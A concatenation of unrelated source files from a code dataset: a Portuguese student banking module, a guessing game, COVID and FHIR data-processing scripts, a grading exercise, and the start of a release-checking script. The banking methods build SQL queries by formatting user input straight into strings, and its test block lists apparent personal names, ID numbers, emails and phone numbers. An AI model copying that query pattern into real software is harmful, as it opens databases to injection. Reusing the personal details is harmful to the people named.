sucesso!\"\n\t\t\t\t\t\terros = 0\n\t\tretorno.append(erros)\n\t\tretorno.append(mensagem)\n\t\t#print(retorno)\n\t\treturn retorno\n\n\n\t# -------------------------------------------------------------- #\t\n\t\"\"\"\n\tdef efetuarTRANSFERENCIA(self, conta1, cpf2, valor):\n\t\tif '' in [cpf2, valor]:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tvalor1 = float(valor)\n\t\t\tconta2 = self.buscaCONTA_cpf(cpf2)\n\t\t\tif conta2 == None:\n\t\t\t\tmensagem = \"A conta destino não foi encontrada!\"\n\t\t\telse:\n\t\t\t\tif conta1.transfere(conta2, valor1):\n\t\t\t\t\tmensagem = \"Transferencia realizada com sucesso!\"\n\t\t\t\telse:\n\t\t\t\t\tmensagem = \"Ocorreu um erro na transferencia\"\n\t\treturn mensagem\n\t\"\"\"\n\t\n\tdef EfetuarDEPOSITAR(self,cpf,depos):\n\t\tif '' in [cpf,depos]:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tvalor = float(depos)\n\t\t\tEncontrado = self.buscaCONTA(cpf)\n\t\t\tsql = (\"SELECT saldo FROM conta WHERE cpf_cliente = '%s'\" %(Encontrado.titular.cpf))\n\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\tsaldo = float(Aqui[0][0])\n\t\t\tif(saldo+valor <= Encontrado.limite):\n\t\t\t\tsql = (\"UPDATE conta SET saldo = '%f' WHERE cpf_cliente = '%s'\" %(saldo+valor,Encontrado.titular.cpf))\t\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Depósito realizado com sucesso!\"\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo = (\"Depósito realizado de %.2f R$.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\telse:\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo = (\"Tentativa de depósito de %.2f R$ recusada.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Depósito realizado sem sucesso!\"\n\t\treturn mensagem\n\t\n\tdef EfetuarSAQUE(self,cpf,saque):\n\t\tif '' in [cpf,saque]:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tvalor = float(saque)\n\t\t\tEncontrado = self.buscaCONTA(cpf)\n\t\t\tsql = (\"SELECT saldo FROM conta WHERE cpf_cliente = '%s'\" %(Encontrado.titular.cpf))\n\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\tsaldo = float(Aqui[0][0])\n\t\t\tif(saldo >= valor ):\n\t\t\t\tsql = (\"UPDATE conta SET saldo = '%f' WHERE cpf_cliente = '%s'\" %(saldo-valor,Encontrado.titular.cpf))\t\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo= (\"Saque realizado de %.2f R$.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Saque realizado com sucesso!\"\n\t\t\telse:\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo = (\"Tentativa de saque de %.2f R$ recusada.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Saque realizado sem sucesso!\"\n\t\treturn mensagem\n\t\n\tdef EfetuarTRANSFERENCIA(self,cpf,destino,transf):\n\t\tif '' in [cpf,destino,transf]:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tvalor = float(transf)\n\t\t\tEncontrado = self.buscaCONTA(cpf)\n\t\t\tEncontrado2 = self.buscaCONTA(destino)\n\t\t\tsql = (\"SELECT saldo FROM conta WHERE cpf_cliente = '%s'\" %(Encontrado.titular.cpf))\n\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\tsaldo = float(Aqui[0][0])\n\t\t\tif(saldo >= valor ):\n\t\t\t\tsql = (\"SELECT saldo FROM conta WHERE cpf_cliente = '%s'\" %(Encontrado2.titular.cpf))\n\t\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\t\tsaldo2 = float(Aqui[0][0])\n\t\t\t\tif(saldo2+valor <= Encontrado2.limite):\n\t\t\t\t\tsql = (\"UPDATE conta SET saldo = '%f' WHERE cpf_cliente = '%s'\" %(saldo2+valor,Encontrado2.titular.cpf))\n\t\t\t\t\tsql2 = (\"UPDATE conta SET saldo = '%f' WHERE cpf_cliente = '%s'\" %(saldo-valor,Encontrado.titular.cpf))\t\n\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\tself.bd.executaALTERACOES(sql2)\t\t\n\t\t\t\t\tdata = datetime.date.today()\n\t\t\t\t\tinfo = (\"Transferência realizada de %.2f R$ para a conta de número (%s).\" %(valor,Encontrado2.numero))\n\t\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\tinfo = (\"Transferência recebida de %.2f R$ da conta de número (%s).\" %(valor,Encontrado.numero))\n\t\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado2.numero,data,info))\n\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\tmensagem = \"Transferência realizada com sucesso!\"\n\t\t\telse:\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo = (\"Tentativa de transferência de %.2f R$ recusada.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Transferência realizada sem sucesso!\"\n\t\treturn mensagem\n\n\n\tdef pegaHISTORICO(self, esse):\n\t\tif esse == None:\n\t\t\tmensagem = None\n\t\telse:\n\t\t\tsql = (\"SELECT * FROM historico WHERE conta_num = '%s'\" %(esse.numero))\n\t\t\tmensagem = self.bd.executaSELECT(sql)\n\t\treturn mensagem\n\n# self,nome,sobrenome,cpf,email,tel\n# numero,cpf,limite,senha,confirmSENHA\n\n\"\"\"\nR = Registros()\nR.cadastrarCLIENTE(\"Vinicius\",\"Dias\",\"33469298092\",\"viniciusdias@ufpi.edu.br\",\"999473-2624\")\nR.cadastrarCLIENTE(\"Matheus\",\"Victor\",\"61206747307\",\"matheusvictor@ufpi.edu.br\",\"999126-7703\")\nR.cadastrarCONTA(\"145-60\",\"33469298092\",50.00,\"AzulDCDM\",\"AzulDCDM\")\nR.cadastrarCONTA(\"754-00\",\"61206747307\",500.00,\"ToLove\",\"ToLove\")\nR.EfetuarDEPOSITAR(\"33469298092\",20.00)\nR.EfetuarDEPOSITAR(\"33469298092\",20.00)\nR.EfetuarTRASFERENCIA(\"33469298092\",\"61206747307\",40.00)\nR.EfetuarTRASFERENCIA(\"33469298092\",\"61206747307\",700.00)\n\"\"\"\n","sub_path":"servidor/registros.py","file_name":"registros.py","file_ext":"py","file_size_in_byte":11676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237122965","text":"\"\"\"First I must import the random function so I can easily choose a\nrandom number\"\"\"\n\nimport random\nr_num = random.randint(1,100)\nt_count = 0\nguess = int(input('Choose a number: '))\n\n\"\"\"loop meant to regulate the response as long as user enters a number\neither too high, low, correct, or if the user runs out of tries\"\"\"\n\nwhile (guess != r_num) and (t_count != 7):\n if guess > r_num:\n print('\\nToo high.')\n t_count += 1\n guess = int(input('Please try again: '))\n elif guess == r_num:\n print('Correct! You guessed the right number.')\n else:\n print('\\nToo low.')\n t_count += 1\n guess = int(input('Please try again: '))\n if guess == r_num:\n print('Correct! You guessed the right number.')\n elif t_count == 7:\n print('You have used up all of your tries. The correct number is', r_num)\n \n\n","sub_path":"guessgame.py","file_name":"guessgame.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573184921","text":"import pandas as pd\nimport datetime as dt\n\nclass Ascertainment:\n fmt_date = lambda date: dt.datetime.strftime(date, '%m-%d-%Y')\n print(fmt_date)\n csv_loc = lambda date: f'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports_us/{Ascertainment.fmt_date(date)}.csv'\n \n def __init__(self, today: dt.datetime, past: dt.datetime) -> None:\n self.today = today\n self.past = past\n print('downloading JHU reports')\n self.today_report = pd.read_csv(Ascertainment.csv_loc(today))\n self.past_report = pd.read_csv(Ascertainment.csv_loc(past))\n\n def ratio_state(self, state: str) -> float:\n conf_total = lambda df: df[df.Province_State == state][['Confirmed', 'Total_Test_Results', 'Deaths']].iloc[0]\n today_conf_total = conf_total(self.today_report)\n past_conf_total = conf_total(self.past_report)\n dConfirmed = (today_conf_total.Confirmed - past_conf_total.Confirmed)\n pos_rate = dConfirmed / (today_conf_total.Total_Test_Results - past_conf_total.Total_Test_Results)\n # death_div_cases = (today_conf_total.Deaths - past_conf_total.Deaths) / dConfirmed\n # From YYG\n day_i = (self.today - dt.timedelta(days=(self.today - self.past).days // 2) - pd.to_datetime('2020-02-01')).days\n prevratio = 1000 / (day_i + 50) * pos_rate**0.5 + 2\n return prevratio\n","sub_path":"covid/ascertainment.py","file_name":"ascertainment.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167924664","text":"import findspark\nfindspark.init()\nimport pyspark\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\nimport pyspark.sql.functions as F\nimport os\nfrom pyspark.sql.types import StringType\n\n\n# setup\ninput_path = '/home/muody/data/fhir_parsed/*.json'\noutput_path = '/home/muody/data/fhir_parsed/csv/'\ndf = spark.read.json(input_path, multiLine=True)\nos.system('rm -r /home/muody/data/fhir_parsed/csv/')\nos.system('mkdir /home/muody/data/fhir_parsed/csv/')\n\n\ndef create_claim(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n output = root.select('id',F.col('claim.reference').alias('claim_number'))\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n # 'member_id'\n sub = root.select('id',F.col('patient.reference').alias('member_id'))\n sub = sub.withColumn('member_id',F.substring('member_id',10,1000))\n output = output.join(sub, on=['id'], how='left').distinct()\n # 'billablePeriod'\n sub = root.select('id','billablePeriod.*')\n sub = sub.select('id',F.col('start').alias('billable_start'),F.col('end').alias('billable_end'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # 'contained'\n sub = root.select(F.col('id').alias('benefit_id'),F.explode('contained'))\n sub = sub.select('benefit_id','col.*')\n sub = sub.select('benefit_id',F.col('beneficiary.reference').alias('beneficiary_id'),'id','intent','status','subject')\n sub = sub.withColumn('beneficiary',F.substring('beneficiary_id',10,1000))\n sub = sub.withColumn('id',F.col('benefit_id'))\n # 'careTeam'\n sub = root.select('id',F.explode('careTeam'))\n sub = sub.select('id','col.*')\n sub = sub.select('id','provider.*','role.*','sequence')\n sub = sub.select('id',F.col('reference').alias('provider_npi'),F.explode('coding'),'sequence')\n sub = sub.select('id','provider_npi',F.col('col.display').alias('provider_role'),F.col('sequence').alias('provider_sequence'))\n sub = sub.withColumn('provider_npi',F.substring('provider_npi',10,1000))\n output = output.join(sub, on=['id'], how='left').distinct()\n # 'payment'\n sub = root.select('id','payment.*')\n sub = sub.select('id','amount.*')\n sub = sub.select('id',F.col('value').alias('paid_amount'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # write to file\n cols = [x for x in output.columns if x != 'id']\n output = output.select(*cols)\n return output.distinct()\n\n\ndef create_claim_line(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n root = root.select('id','claim.*',F.explode('item'))\n root = root.select('id',F.col('reference').alias('claim_number'),'col.*')\n # main\n output = root.select('id','claim_number',F.col('sequence').alias('claim_line_number'))\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n # category\n sub = root.select('id','category.*')\n sub = sub.select('id',F.explode('coding'))\n sub = sub.select('id','col.*')\n sub = sub.select('id',F.col('code').alias('category_code'),F.col('display').alias('category_name'),'system')\n sub = sub.select('id','category_code','category_name',F.col('system').alias('category_code_system'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # locationCodeableConcept\n sub = root.select('id','locationCodeableConcept.*')\n sub = sub.select('id',F.explode('coding'))\n sub = sub.select('id','col.*')\n sub = sub.select('id',F.col('code').alias('location_code'),F.col('display').alias('location_name'),'system')\n sub = sub.select('id','location_code','location_name',F.col('system').alias('location_code_system'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # net\n sub = root.select('id',F.col('sequence').alias('claim_line_number'),'net.*')\n sub = sub.select('id','claim_line_number',F.col('value').alias('net_value'))\n output = output.join(sub, on=['id','claim_line_number'],how='left').distinct()\n # servicedPeriod\n sub = root.select('id',F.col('sequence').alias('claim_line_number'),'servicedPeriod.*')\n sub = sub.select('id','claim_line_number',F.col('start').alias('first_dos'),F.col('end').alias('last_dos'))\n output = output.join(sub, on=['id','claim_line_number'], how='left').distinct()\n # productOrService\n sub = root.select('id','sequence','productOrService.*')\n sub = sub.select('id','sequence',F.explode('coding'))\n sub = sub.select('id','sequence','col.*')\n sub = sub.select('id','sequence','code',F.col('display').alias('name'),'system')\n sub = sub.select('id',F.col('sequence').alias('claim_line_number'), 'code', 'name', F.col('system').alias('code_system'))\n output = output.join(sub, on=['id','claim_line_number'], how='left').distinct()\n # adjudication\n sub = root.select('id',F.explode('adjudication'))\n sub = sub.select('id','col.*')\n sub = sub.select('id','amount.*','category.*')\n sub = sub.select('id','value',F.explode('coding'))\n sub = sub.select('id','value','col.*')\n sub = sub.select('id',F.col('value').alias('transaction_amount'),F.col('display').alias('transaction_type'))\n cols = [x for x in output.columns if x != 'id'] \n return output.select(*cols).distinct()\n\n\ndef create_procedure(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n root = root.select('id','claim.*',F.explode('item'))\n root = root.select('id',F.col('reference').alias('claim_number'),'col.*')\n root = root.withColumn('claim_number',F.substring('claim_number',10,1000))\n # main\n output = root.select('id','claim_number')\n # productOrService\n sub = root.select('id','productOrService.*')\n sub = sub.select('id',F.explode('coding'))\n sub = sub.select('id','col.*')\n sub = sub.select('id',F.col('code').alias('procedure_code'),F.col('display').alias('procedure_name'),'system')\n sub = sub.select('id','procedure_code','procedure_name',F.col('system').alias('procedure_code_system'))\n output = output.join(sub, on=['id'], how='left').distinct()\n cols = [x for x in output.columns if x != 'id']\n return output.select(*cols).distinct()\n\n\ndef create_provider(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n output = root.select('id',F.col('claim.reference').alias('claim_number'))\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n # careTeam\n sub = root.select('id',F.explode('careTeam'))\n sub = sub.select('id','col.*')\n sub = sub.select('id','provider.*','role.*','sequence')\n sub = sub.select('id',F.col('reference').alias('provider_id'),F.explode('coding'),'sequence')\n sub = sub.select('id','provider_id',F.col('col.display').alias('provider_role'),F.col('sequence').alias('provider_sequence'))\n sub = sub.withColumn('provider_id',F.substring('provider_id',10,1000))\n output = output.join(sub, on=['id'], how='left').distinct()\n # practitioner\n root = df.select(F.explode('resourcePractitioner'))\n root = root.select('col.*')\n sub = root.select('id','active','gender',F.explode('name'),'identifier')\n sub = sub.select(F.col('id').alias('provider_id'),'identifier','col.*')\n sub = sub.select('provider_id','family',F.col('given').getItem(0).alias('first_name'),'prefix')\n sub = sub.select('provider_id','family','first_name',F.col('prefix').getItem(0).alias('prefix'))\n sub = sub.select('provider_id',F.col('family').alias('last_name'),'first_name','prefix')\n output = output.join(sub, on=['provider_id'], how='left').distinct()\n # specialty\n sub = sub.select('provider_id').distinct()\n sub = sub.withColumn('group_name',F.lit('Gray Matter Health Center'))\n sub = sub.withColumn('provider_specialty_desc', \n\t\t\t F.when(F.rand() > 0.75, \"General Practice\")\\\n\t\t\t .when(F.rand() > 0.50, \"Family Medicine\")\\\n\t\t\t .when(F.rand() > 0.25, \"Preventive Medicine\")\\\n\t\t\t .otherwise(\"Internal Medicine\"))\n output = output.join(sub, on=['provider_id'], how='left').distinct()\n # rename provider npi\n output = output.withColumn('provider_npi',F.col('provider_id'))\n output = output.select(*[x for x in output.columns if x != 'provider_id'])\n cols = [x for x in output.columns if x != 'id']\n return output.select(*cols).distinct()\n\n\ndef create_diagnosis(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n output = root.select('id',F.col('claim.reference').alias('claim_number'))\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n # diagnosis\n sub = root.select('id',F.explode('diagnosis'))\n sub = sub.select('id','col.*')\n sub = sub.select('id','diagnosisReference.*',F.explode('type'),'sequence')\n sub = sub.select('id','reference','col.*','sequence')\n sub = sub.select('id','reference',F.explode('coding'),'sequence')\n sub = sub.select('id',F.col('reference').alias('diagnosis_id'),'col.*','sequence')\n sub = sub.select('id','diagnosis_id',F.col('code').alias('type'),'sequence')\n sub = sub.withColumn('diagnosis_id',F.substring('diagnosis_id',10,1000))\n output = output.join(sub, on=['id'], how='left').distinct()\n # condition\n root = df.select(F.explode('resourceCondition'))\n root = root.select('col.*')\n sub = root.select('id','code.*')\n sub = sub.select('id',F.explode('coding'))\n sub = sub.select(F.col('id').alias('diagnosis_id'),'col.*')\n output = output.join(sub, on=['diagnosis_id'], how='left').distinct()\n output = output.filter(F.col('diagnosis_id').isNull()==False)\n output = output.select(\n\t'claim_number',\n\tF.col('code').alias('code'),\n\tF.col('display').alias('name'),\n\tF.col('system').alias('code_system'),\n )\n return output.distinct()\n\n\ndef create_medication(df):\n root = df.select(F.explode('resourceClaim'))\n root = root.select('col.*')\n output = root.select(F.col('id').alias('claim_number'))\n # prescription\n sub = root.select('id','prescription.*')\n sub = sub.select(F.col('id').alias('claim_number'),F.col('reference').alias('medication_id'))\n sub = sub.withColumn('medication_id',F.substring('medication_id',10,1000))\n output = output.join(sub, on=['claim_number'], how='left').distinct()\n # medicationCodeableConcept\n root = df.select(F.explode('resourceMedicationRequest'))\n root = root.select('col.*')\n sub = root.select('id','medicationCodeableConcept.*','authoredOn')\n sub = sub.select('id',F.explode('coding'),'authoredOn')\n sub = sub.select('id','col.*','authoredOn')\n sub = sub.select('id',F.col('code').alias('medication_code'),F.col('display').alias('medication_name'),'system','authoredOn')\n sub = sub.select('id','medication_code','medication_name',F.col('system').alias('medication_code_system'),'authoredOn')\n sub = sub.select(F.col('id').alias('medication_id'),'medication_code','medication_name','medication_code_system','authoredOn')\n sub = sub.select('medication_id','medication_code','medication_name','medication_code_system',F.col('authoredOn').alias('date_of_service'))\n output = output.join(sub, on=['medication_id'], how='left').distinct()\n output = output.withColumn('rx_claim_number',F.concat(F.col('claim_number'),F.col('medication_id')))\n output = output.filter(F.col('medication_id').isNull()==False)\n return output.distinct()\n\n\ndef create_member(df):\n # MEMBER\n root = df.select(F.explode('resourcePatient'))\n root = root.select('col.*')\n output = root.select('id',F.col('birthDate').alias('date_of_birth'),'gender')\n # name\n sub = root.select('id',F.explode('name').alias('name'))\n sub = sub.select('id','name.*')\n sub = sub.select('id','family',F.explode('given').alias('given'))\n sub = sub.select('id',F.col('family').alias('last_name'),F.col('given').alias('first_name'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # address\n sub = root.select('id',F.explode('address').alias('address'))\n sub = sub.select('id','address.*')\n sub = sub.select('id',F.col('postalCode').alias('zip_code'),'state')\n output = output.join(sub, on=['id'], how='left').distinct()\n output = output.withColumn('member_id', F.col('id'))\n cols = [x for x in output.columns if x != 'id']\n output = output.select(*cols).distinct()\n return output.distinct()\n\n\ndef create_eligibility(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n output = root.select(F.col('id').alias('benefit_id'),F.col('claim.reference').alias('claim_number'),'patient.reference')\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n output = output.withColumn('member_id',F.substring('reference',10,1000))\n output = output.select('member_id','claim_number','benefit_id')\n # billablePeriod\n sub = root.select('id','billablePeriod.*')\n sub = sub.select('id','start','end')\n sub = sub.select(F.col('id').alias('benefit_id')\n , F.year('end').alias('y'),F.month('end').alias('m'))\n sub = sub.withColumn('plan_effective_date', F.when(F.col('m') >= 11\n , F.col('y')).otherwise(F.col('y')-1))\n sub = sub.withColumn('plan_expiration_date', F.when(F.col('m') >= 11\n , F.col('y')+1).otherwise(F.col('y')))\n sub = sub.withColumn('plan_effective_date', F.concat(F.lit(\"11/01/\")\n , F.col('plan_effective_date').cast(\"string\")))\n sub = sub.withColumn('plan_expiration_date', F.concat(F.lit(\"10/31/\")\n , F.col('plan_expiration_date').cast(\"string\")))\n sub = sub.withColumn('plan_effective_date'\n , F.from_unixtime(F.unix_timestamp('plan_effective_date', 'MM/dd/yyy')))\n sub = sub.withColumn('plan_expiration_date'\n , F.from_unixtime(F.unix_timestamp('plan_expiration_date', 'MM/dd/yyy')))\n output = output.join(sub, on=['benefit_id'], how='left').distinct()\n # insurance\n sub = root.select('id',F.explode('insurance'))\n sub = sub.select('id','col.*')\n sub = sub.select(F.col('id').alias('benefit_id'),F.col('coverage.display').alias('product_category'))\n output = output.join(sub, on=['benefit_id'], how='left').distinct()\n output = output.select(*[x for x in output.columns if x not in ['benefit_id','claim_number','y','m']])\n output = output.join(member,on=['member_id'],how='left').distinct()\n return output.distinct()\n\n\ndef create_lab(df):\n root = df.select(F.explode('resourceDiagnosticReport'))\n root = root.select('col.*')\n output = root.select(F.substring('subject.reference',10,1000).alias('member_id'))\n # prescription\n sub = root.select(F.substring('subject.reference',10,1000).alias('member_id'),'id','code.*')\n sub = sub.select('member_id',F.col('id').alias('lab_id'),F.explode('coding'))\n sub = sub.select('member_id','lab_id','col.*')\n output = output.join(sub, on=['member_id'], how='left').distinct()\n # lab date\n sub = root.select(F.col('id').alias('lab_id'),F.col('effectiveDateTime').alias('date'))\n output = output.join(sub, on=['lab_id'], how='left').distinct()\n return output.distinct()\n\nif __name__ == \"__main__\":\n claim = create_claim(df)\n claim_line = create_claim_line(df)\n procedure = create_procedure(df)\n diagnosis = create_diagnosis(df)\n medication = create_medication(df)\n member = create_member(df)\n eligibility = create_eligibility(df)\n lab = create_lab(df)\n provider = create_provider(df)\n\n\n claim.write.csv(output_path+'claim.csv', header=True)\n claim_line.write.csv(output_path+'claim_line.csv', header=True)\n provider.write.csv(output_path+'provider.csv', header=True)\n diagnosis.write.csv(output_path+'diagnosis.csv', header=True)\n medication.write.csv(output_path+'medication.csv', header=True)\n member.write.csv(output_path+'member.csv', header=True)\n eligibility.write.csv(output_path+'eligibility.csv', header=True)\n lab.write.csv(output_path+'lab.csv', header=True)\n","sub_path":"02_fhir_to_flat_sds.py","file_name":"02_fhir_to_flat_sds.py","file_ext":"py","file_size_in_byte":16111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242092877","text":"\n# Média 3\n\nentrada = input().split()\n\nn1 = float(entrada[0])\nn2 = float(entrada[1])\nn3 = float(entrada[2])\nn4 = float(entrada[3])\n\n# Pesos: 2, 3, 4 e 1\nmedia = (n1*2) + (n2*3) + (n3*4) + (n4*1)\nmedia /= 10\n\nprint(\"Media: {m:1.1f}\".format(m=media))\n\nif media >= 7.0:\n print(\"Aluno aprovado.\")\nelif media < 5.0:\n print(\"Aluno reprovado.\")\nelif 5.0 <= media <= 6.9:\n print(\"Aluno em exame.\")\n\n exame = float(input())\n media = (media + exame)/2\n\n print(\"Nota do exame: {e:1.1f}\".format(e=exame))\n if exame >= 5.0:\n print(\"Aluno aprovado.\")\n else:\n print(\"Aluno reprovado.\")\n\n print(\"Media final: {m:1.1f}\".format(m=media))\n","sub_path":"uri/beginner/1040.py","file_name":"1040.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"305993744","text":"#! /usr/bin/python3\n\n#################################################\n# Natasha\n# Natasha is a script to crawl acQuire servers and\n# check the synchronisation of software releases.\n#\n# v1.025\n# for Issue \n#\n# Rodrigo Nobrega\n# 20150305-20181217\n#################################################\n__author__ = 'Rodrigo Nobrega'\n\n\n# import modules\nimport os.path\n# import datetime\n\n\n# variables USAGE:\nGIMVERSION = '4.0.1'\nACQVERSION = '4.5.7.1'\nNEOVERSION = '4.0.1.179'\nPCEWMVERSION = '4.0'\nPCEWCVERSION = '2.2'\nLRNVERSION = '2018.4'\nDRPWVERSION = '1.4.0'\nREFVERSION = '4.0.0'\nDEMOVERSION = '4.0.1'\n\n\n# NtServers()\nclass NtServers(object):\n \"\"\"\n Class to store acQuire internal server names\n \"\"\"\n def __init__(self):\n self.serverList = [['Perth', 'Fileserver', r'\\\\fileserver\\Client Release Distribution']\n #, ['Brisbane', 'BrisbaneFS', r'\\\\brisbanefs\\acQuire Software']\n #, ['Belo Horizonte', 'BeloFS', r'\\\\belofs\\Client Release Distribution']\n , ['Calgary', 'Warthog', r'\\\\warthog\\acQuireSoftware']\n , ['Johannesburg', 'JoburgFS', r'\\\\joburgfs\\acQuire Software']\n #, ['Manchester', 'ManchesterFS', r'\\\\manchesterfs\\acQuire Software']\n , ['Santiago', 'SantiagoFS', r'\\\\santiagofs\\Client Release Distribution']]\n\n\n# NtSoftware()\nclass NtSoftware(object):\n \"\"\"\n Class to store acQuire Software\n \"\"\"\n def __init__(self):\n self.softwareList = [[0, 'Everything', '', '']\n , [1, 'GIM Suite', '\\\\acQuire GIM Suite\\\\', '\\\\acQuire GIM Suite Desktop.exe', GIMVERSION]\n , [2, 'acQuire 4', '\\\\acQuire\\\\acQuire ', '\\\\web\\\\acquire.exe', ACQVERSION]\n , [3, 'acQuire Neo', '\\\\acQuire Neo\\\\acQuire Neo ', '\\\\acQuire Neo.msi', NEOVERSION]\n # , [4, 'Exploration Workflow - Minerals', '\\\\acQuire Packaged Workflows\\\\Exploration Workflow - Minerals\\\\', '\\\\acQuire Pre-configured Exploration Workflow - Minerals.exe', PCEWMVERSION]\n , [4, 'Exploration Workflow - Minerals', '\\\\acQuire Packaged Workflows\\\\Exploration Workflow - Minerals\\\\', '\\\\acQuire Pre-configured Exploration Workflow - Minerals.zip', PCEWMVERSION]\n , [5, 'Exploration Workflow - Coal', '\\\\acQuire Packaged Workflows\\\\Exploration Workflow - Coal\\\\', '\\\\acQuire Pre-configured Exploration Workflow - Coal.exe', PCEWCVERSION]\n , [6, 'Drilling Reconciliation Packaged Workflow [DRPW]', '\\\\acQuire Packaged Workflows\\\\Drilling Reconciliation\\\\', '\\\\acQuire Packaged Workflows - DR.exe', DRPWVERSION]\n # , [7, 'Reference Sets - Banksia Minerals', '\\\\acQuire Reference Sets\\\\', '\\\\Reference Datasets\\\\Minerals\\\\Banksia Minerals.msi', REFVERSION]\n , [7, 'Reference Sets - Banksia Minerals', '\\\\acQuire Reference Sets\\\\', '\\\\Reference Datasets\\\\Minerals\\\\Banksia_Minerals.zip', REFVERSION]\n , [8, 'acQuire Learning', '\\\\acQuire Learning\\\\', '\\\\Learning VM\\\\GIM Suite Learning VM.7z.001', LRNVERSION]\n # , [9, 'GIM Suite Demo VM', '\\\\acQuire Reference Sets\\\\', '\\\\GIM Suite {0} Demo VM\\\\GIM Suite {0} Demo VM.7z.001'.format(DEMOVERSION.replace('.0', '')), DEMOVERSION]\n , [9, 'GIM Suite Demo VM', '\\\\acQuire Reference Sets\\\\', '\\\\GIM Suite {0} Demo VM\\\\GIM Suite {0} Demo VM.part01.exe'.format(DEMOVERSION), DEMOVERSION]\n ]\n\n def getSoftware(self, option):\n if option < 0 or option > 6:\n option = 0\n else:\n option = int(option)\n if option == 0:\n return [i[1] for i in self.softwareList if i[0] > 0]\n else:\n return [i[1] for i in self.softwareList if i[0] == option]\n\n\n# NtSoftware()\nclass NtVersion(object):\n \"\"\"\n Class to store current versions\n \"\"\"\n def __init__(self):\n self.currentList = [[0, 'Everything', '1']\n , [1, 'GIM Suite', GIMVERSION]\n , [2, 'acQuire 4', ACQVERSION]\n , [3, 'acQuire Neo', NEOVERSION]\n , [4, 'Packaged Workflow [DRPW]', DRPWVERSION]\n , [5, 'Reference Sets', REFVERSION]\n , [6, 'acQuire Learning', LRNVERSION]\n , [7, 'GIM Suite Demo VM', DEMOVERSION]]\n\n def getVersion(self, software, option=None):\n if option == '' and len(software) == 1:\n return [i[2] for i in self.currentList if i[1] == software[0]]\n elif option == '' and len(software) > 1:\n # return [[i, j[2]] for i in software for j in self.currentList if i == j[1]]\n return [j[2] for i in software for j in self.currentList if i == j[1]]\n else:\n return option\n\n\n# NtOptions()\nclass NtOptions(object):\n \"\"\"\n Class to store user choices\n \"\"\"\n def __init__(self):\n # softwareOption\n try:\n a = 